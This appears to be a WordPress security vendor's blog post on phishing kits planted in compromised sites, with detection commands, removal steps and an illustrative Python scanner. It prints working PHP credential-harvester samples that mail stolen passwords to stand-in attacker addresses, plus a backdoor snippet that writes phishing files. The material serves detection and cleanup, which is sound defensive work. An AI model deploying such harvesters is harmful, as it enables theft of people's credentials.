Your WordPress site might be hosting a fake PayPal login page right now — and you'd never know, because it's in a subdirectory you never check.
Why attackers use WordPress for phishing
Compromised WordPress sites are the perfect phishing host:
- Established domain reputation — Your domain has a history, SSL certificate, and Google trust. Phishing pages hosted on your domain bypass email spam filters more easily than newly registered domains
- Free hosting — The attacker doesn't pay for hosting. You do
- Scale — Automated tools can deploy phishing kits to thousands of compromised WordPress sites simultaneously
- Stealth — Phishing pages are often in deep subdirectories that site owners never visit
What phishing kits look like
A typical phishing kit is a ZIP archive that extracts to a directory like:
```
/wp-content/uploads/2026/01/docs/
├── index.html ← Fake login page (PayPal, Microsoft, etc.)
├── post.php ← Credential harvesting script
├── style.css ← Cloned CSS from the real site
├── images/
│ ├── logo.png ← Stolen branding
│ └── bg.jpg
└── .htaccess ← Blocks certain IPs (security researchers)
```
The post.php script collects submitted credentials and either emails them to the attacker or writes them to a local file:
```php
<?php
// Typical credential harvester
$email = $_POST['email'];
$pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = "Email: $email | Pass: $pass | IP: $ip\n";
file_put_contents('logs.txt', $data, FILE_APPEND);
// Also email to attacker
mail('attacker@proton.me', 'New catch', $data);
// Redirect victim to real site
header('Location: https://www.paypal.com/signin');
```
How to detect phishing on your site
Signs you might be hosting phishing pages
- Google Search Console warnings — "Deceptive content detected" in the Security Issues section. This is one of the key warning signs your WordPress site has been hacked
- Hosting provider notices — Abuse reports forwarded from anti-phishing organisations
- Unexpected traffic spikes — Sudden increase in traffic to URLs you don't recognise
- Email deliverability drops — Your domain may be blacklisted by email providers
- Browser warnings — Chrome showing "Deceptive site ahead" to your visitors
Using WO Security Shield to find phishing kits
WO Security Shield detects phishing kits by:
- Scanning the uploads directory — HTML files in /wp-content/uploads/ are flagged (legitimate WordPress uploads are media files, not HTML)
- Detecting credential harvesting patterns — PHP files that read POST data and email it or write to files
- Identifying brand impersonation — Files containing references to PayPal, Microsoft, Apple, Google, bank login pages
- Monitoring .htaccess anomalies — Phishing kits often include .htaccess files that block security scanners by IP
Removal steps
1. Find all phishing directories
In your WO Security Shield dashboard, check the findings panel for:
- HTML files in upload directories
- PHP files with credential harvesting signatures
- Suspicious .htaccess files in directories other than the WordPress root (for example deep inside uploads)
2. Delete the phishing kit entirely
Remove the entire directory, not just individual files. Phishing kits often contain dozens of files. After removal, scan for PHP backdoors that the attacker may have planted elsewhere on your server.
3. Check for the entry point
The phishing kit didn't upload itself. Common entry points:
- Vulnerable file upload plugin — Contact Form 7 add-ons, custom upload handlers
- Compromised admin account — Check your user list and login logs. Strengthen your defenses with our WordPress login page security guide
- FTP/SFTP access — If the attacker has your credentials, they can upload directly
4. Request review from Google
If your site was flagged:
- Go to Google Search Console
- Navigate to Security & Manual Actions
- Click "Request a review" after removing the phishing content
5. Check blacklists
Your domain may be listed on anti-phishing blacklists. Check:
Phishing is one of the most damaging things that can happen to your domain's reputation. A single incident can get your site blacklisted across browsers, email providers, and search engines. Scan for phishing kits regularly with WO Security Shield.
How Attackers Install Phishing Pages
Understanding the installation process helps you prevent and detect phishing attacks:
Common Installation Methods
1. Through vulnerable file upload forms:
Attacker uploads a ZIP file containing:
```
├── index.html (fake login page — looks like PayPal, bank, etc.)
├── style.css (copied from the real site)
├── logo.png (copied from the real site)
├── submit.php (sends stolen credentials to attacker)
└── .htaccess (hides directory listing)
```
2. Through a PHP backdoor already on the server:
```php
// The backdoor writes phishing files directly
file_put_contents('/wp-content/uploads/secure-login/index.html', $phishing_html);
file_put_contents('/wp-content/uploads/secure-login/submit.php', $credential_handler);
```
3. Through compromised WordPress admin access: The attacker uses the Theme Editor or Plugin Editor to inject phishing pages into existing theme directories where they blend in with legitimate files.
What a Phishing Kit Looks Like
A typical WordPress-hosted phishing page collects credentials and forwards them:
```php
<?php
// submit.php — the credential harvester
$email = $_POST['email'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
// Send to attacker
$data = "Email: $email\nPassword: $password\nIP: $ip\nBrowser: $ua\n";
mail('attacker@example.com', 'New Catch', $data);
// Also log to a file the attacker retrieves later
file_put_contents('.logs.txt', $data, FILE_APPEND);
// Redirect victim to the real site so they don't suspect anything
header('Location: https://real-site.com/login');
exit;
?>
```
Detection: Finding Phishing Pages on Your Site
Automated scanning: WO Security Shield detects phishing pages by identifying:
- HTML files containing login forms that don't belong to WordPress
- CSS/images copied from known brands (banks, PayPal, Microsoft, etc.)
- PHP files that process POST data and send it via email or to external servers
Manual detection commands:
```bash
# Find HTML files outside normal WordPress locations
find /var/www/html/wp-content/uploads -name "*.html" -o -name "*.htm"
# Search for credential-harvesting patterns
grep -rl "\$_POST.*password\|\$_POST.*passwd" /var/www/html/wp-content/
# Find files that send emails with POST data
grep -rl "mail.*\$_POST" /var/www/html/wp-content/
# Look for hidden directories in uploads
find /var/www/html/wp-content/uploads -type d -name ".*"
```
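The scanner below is an added example, not WO Security Shield's code or part of the original post: it turns the detection heuristics listed earlier (HTML in uploads, POST-reading PHP that mails or writes data, brand names in login forms, IP-blocking .htaccess files) and the manual find/grep commands above into one walk over an uploads tree. The regexes and the sample kit it builds in a temporary directory are constructed for illustration.

```python
import os
import re
import tempfile

# Heuristics paraphrasing the page's detection list (constructed; not WO Security Shield's own).
BRANDS = re.compile(r"paypal|microsoft|apple|google|bank", re.I)
POST_READ = re.compile(r"\$_POST\s*\[")
EXFIL = re.compile(r"\b(mail|file_put_contents|curl_exec)\s*\(")
HTACCESS_BLOCK = re.compile(r"^\s*(deny from|Require not ip)\b", re.I | re.M)

def scan_uploads(uploads_dir):
    """Walk an uploads tree; return sorted (relative path, reason) findings."""
    findings = []
    for root, _dirs, files in os.walk(uploads_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, uploads_dir).replace(os.sep, "/")
            ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext not in ("html", "htm", "php", "phtml") and name != ".htaccess":
                continue  # media files are the expected content of uploads/
            with open(path, "r", errors="replace") as fh:
                content = fh.read()
            if ext in ("html", "htm"):
                findings.append((rel, "html-in-uploads"))
                if "<form" in content.lower() and BRANDS.search(content):
                    findings.append((rel, "brand-impersonation-login-form"))
            elif ext in ("php", "phtml"):
                if POST_READ.search(content) and EXFIL.search(content):
                    findings.append((rel, "credential-harvester"))
            elif HTACCESS_BLOCK.search(content):
                findings.append((rel, "htaccess-ip-block"))
    return sorted(findings)

def demo():
    """Build a constructed sample kit next to a legitimate image and scan it."""
    with tempfile.TemporaryDirectory() as base:
        kit = os.path.join(base, "2026", "01", "docs")
        os.makedirs(os.path.join(kit, "images"))
        samples = {  # constructed file bodies, just enough to trip each heuristic
            "index.html": "<html><form action='post.php'>PayPal log in</form></html>",
            "post.php": "<?php $d = $_POST['password']; mail('x@example.com', 'c', $d);",
            ".htaccess": "Options -Indexes\ndeny from 203.0.113.0/24\n",
            "images/logo.png": "not-really-png",
        }
        for rel, body in samples.items():
            with open(os.path.join(kit, rel), "w") as fh:
                fh.write(body)
        with open(os.path.join(base, "2026", "01", "photo.jpg"), "w") as fh:
            fh.write("jpeg")  # legitimate media upload; must not be flagged
        return scan_uploads(base)
```

Point `scan_uploads()` at a real `/wp-content/uploads/` to list candidates for the removal steps above; media files are skipped, so a clean uploads tree returns an empty list.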
The Consequences of Hosting Phishing Pages
Even though you didn't create the phishing page, hosting one has serious consequences:
| Consequence | Impact | Recovery time |
|---|---|---|
| Google Safe Browsing blacklist | "Deceptive site ahead" warning for ALL pages | 1-4 weeks |
| Domain blacklisted by email providers | Your emails go to spam | 2-8 weeks |
| Hosting account suspended | Site goes offline completely | Hours to days |
| Search ranking penalty | Significant drop in organic traffic | 1-3 months |
| Legal liability | Potential lawsuits from phishing victims | Varies |
The reputational damage from hosting a phishing page is often worse than hosting malware, because it directly harms real people who enter their credentials.
